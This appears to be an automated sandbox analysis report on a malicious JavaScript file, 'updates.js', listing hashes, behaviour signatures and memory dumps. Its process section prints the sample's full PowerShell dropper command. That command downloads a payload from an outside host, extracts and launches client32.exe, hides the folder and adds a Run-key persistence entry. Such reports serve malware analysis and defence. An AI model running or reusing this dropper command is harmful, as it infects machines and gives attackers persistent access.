Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240419-en
  • resource tags

    arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system
  • submitted
    05-06-2024 16:31

General

  • Target

    updates.js

  • Size

    7.3MB

  • MD5

    a05000c90cff2539713a0c3036ddde7d

  • SHA1

    906117ba8d23127d1f60c2bbb50415038e0933d1

  • SHA256

    10585bbc8a42ce31feda61126cd245ec22d98870fde6c2742d44ef08eaa11b67

  • SHA512

    554662f8fe351e9dc8f9e7cbf4fd072d4cbcd2e7ca31699c959bfc3106630acb52d1e14e368ba75182ae150db72422aba7052cad3b3e5a64120ae02bd2e80542

  • SSDEEP

    49152:e7h4zjCxb7qHlp4XONN0G7h20kQmwYzYMm7u+8wgJ3wr/xN1GIWx3qpWROg2cE0M:p

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://lilygovert91.top/data.php?13264

exe.dropper

http://lilygovert91.top/data.php?13264

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\updates.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1732
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $QAWIRCZGEPZ='http://lilygovert91.top/data.php?13264';$URIC=(New-Object System.Net.WebClient).DownloadString($QAWIRCZGEPZ);$DUCB=[System.Convert]::FromBase64String($URIC);$asd = Get-Random -Minimum -10 -Maximum 37; $MBZSXZG=[System.Environment]::GetFolderPath('ApplicationData')+'\FVQT'+$asd;if (!(Test-Path $MBZSXZG -PathType Container)) { New-Item -Path $MBZSXZG -ItemType Directory };$p=Join-Path $MBZSXZG 'wah.zip';[System.IO.File]::WriteAllBytes($p,$DUCB);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$MBZSXZG)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $MBZSXZG 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $MBZSXZG -Force; $fd.attributes='Hidden';$s=$MBZSXZG+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='GWNBWMKOA';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2264

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2264-4-0x000007FEF63CE000-0x000007FEF63CF000-memory.dmp

    Filesize

    4KB

  • memory/2264-5-0x000000001B7F0000-0x000000001BAD2000-memory.dmp

    Filesize

    2.9MB

  • memory/2264-6-0x0000000001DE0000-0x0000000001DE8000-memory.dmp

    Filesize

    32KB

  • memory/2264-7-0x000007FEF6110000-0x000007FEF6AAD000-memory.dmp

    Filesize

    9.6MB

  • memory/2264-8-0x000007FEF6110000-0x000007FEF6AAD000-memory.dmp

    Filesize

    9.6MB

  • memory/2264-9-0x000007FEF6110000-0x000007FEF6AAD000-memory.dmp

    Filesize

    9.6MB

  • memory/2264-11-0x000007FEF6110000-0x000007FEF6AAD000-memory.dmp

    Filesize

    9.6MB